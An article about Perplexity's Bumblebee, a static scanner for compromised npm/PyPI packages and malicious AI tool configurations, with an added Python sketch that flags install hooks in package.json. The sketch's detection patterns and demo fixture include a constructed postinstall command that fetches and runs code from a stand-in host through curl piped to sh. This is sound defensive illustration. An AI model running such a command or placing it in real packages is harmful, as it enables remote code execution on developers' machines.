Perplexity AI has released Bumblebee, a security scanning tool designed to detect compromised software packages and malicious AI tool configurations on developer machines without executing the potentially dangerous code.

The tool addresses a critical gap in supply chain security. Developers often install third-party packages from repositories like npm and PyPI, where bad actors can inject malicious code. Traditional antivirus and malware detection tools require running code to analyze it, creating a catch-22: you need to execute the software to find threats, but execution itself poses infection risk.

Bumblebee solves this by analyzing package metadata, file structures, and configuration files without running any code. It scans for behavioral signatures, suspicious file patterns, and known indicators of compromise. The tool specifically targets AI tool configurations, recognizing that large language model setup files and API credentials represent a unique attack surface for threat actors seeking to exploit generative AI infrastructure.
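A minimal sketch of the static approach described above, added here as an illustration; it is not Bumblebee's code, and its heuristics and sample package names are assumptions. It reads npm `package.json` manifests purely as data and flags the lifecycle hooks npm would run automatically at install time, without executing anything from the package.

```python
import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Illustrative heuristics (assumptions for this example, not a published rule set).
SUSPICIOUS = {
    "download piped to shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"),
    "inline interpreter code": re.compile(r"\b(node\s+-e|python3?\s+-c)\b"),
}

def scan_manifest(path):
    """Return (label, command) findings for one package.json, read as data only."""
    try:
        manifest = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, ValueError) as exc:
        return [("unreadable manifest", str(exc))]
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        # Any install-time hook deserves review, even without a pattern match.
        findings.append((f"install hook: {hook}", cmd))
        findings.extend((f"{hook}: {label}", cmd)
                        for label, rx in SUSPICIOUS.items() if rx.search(cmd))
    return findings

def scan_tree(root):
    """Scan every package.json under root; keep only manifests with findings."""
    hits = {str(p): scan_manifest(p) for p in sorted(Path(root).rglob("package.json"))}
    return {p: f for p, f in hits.items() if f}

def demo():
    # Constructed manifests; example.invalid is a reserved, non-resolving domain.
    samples = {"constructed-bad-pkg": {"postinstall": "curl -s https://example.invalid/x | sh"},
               "constructed-ok-pkg": {"test": "node test.js"}}
    with tempfile.TemporaryDirectory() as tmp:
        for name, scripts in samples.items():
            pkg = Path(tmp, "node_modules", name)
            pkg.mkdir(parents=True)
            (pkg / "package.json").write_text(json.dumps({"name": name, "scripts": scripts}))
        return {Path(p).parent.name: [label for label, _ in f]
                for p, f in scan_tree(tmp).items()}
```

The `test` script in the second sample is not reported because npm does not run it during installation.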

The release reflects growing concerns about software supply chain attacks. High-profile incidents like the SolarWinds breach and the XZ Utils backdoor have demonstrated how compromised dependencies can spread across thousands of organizations. For developers working with AI tools, the stakes are even higher. Compromised LLM configurations could expose API keys, exfiltrate training data, or insert malicious prompts into AI systems.

Perplexity positions Bumblebee as a proactive defense layer. Rather than waiting for malware to execute, developers can run the scanner before installing new packages or pulling in dependencies. The tool integrates with developer workflows, flagging suspicious packages during the review stage.

The move underscores how AI companies are increasingly investing in security infrastructure. As AI tools become embedded in production systems, threats targeting these tools escalate. Bumblebee won't catch every attack, but it raises the bar for adversaries attempting supply chain compromise. For developers managing complex dependency chains and AI integrations, the tool offers practical defense without the performance overhead of traditional runtime scanning.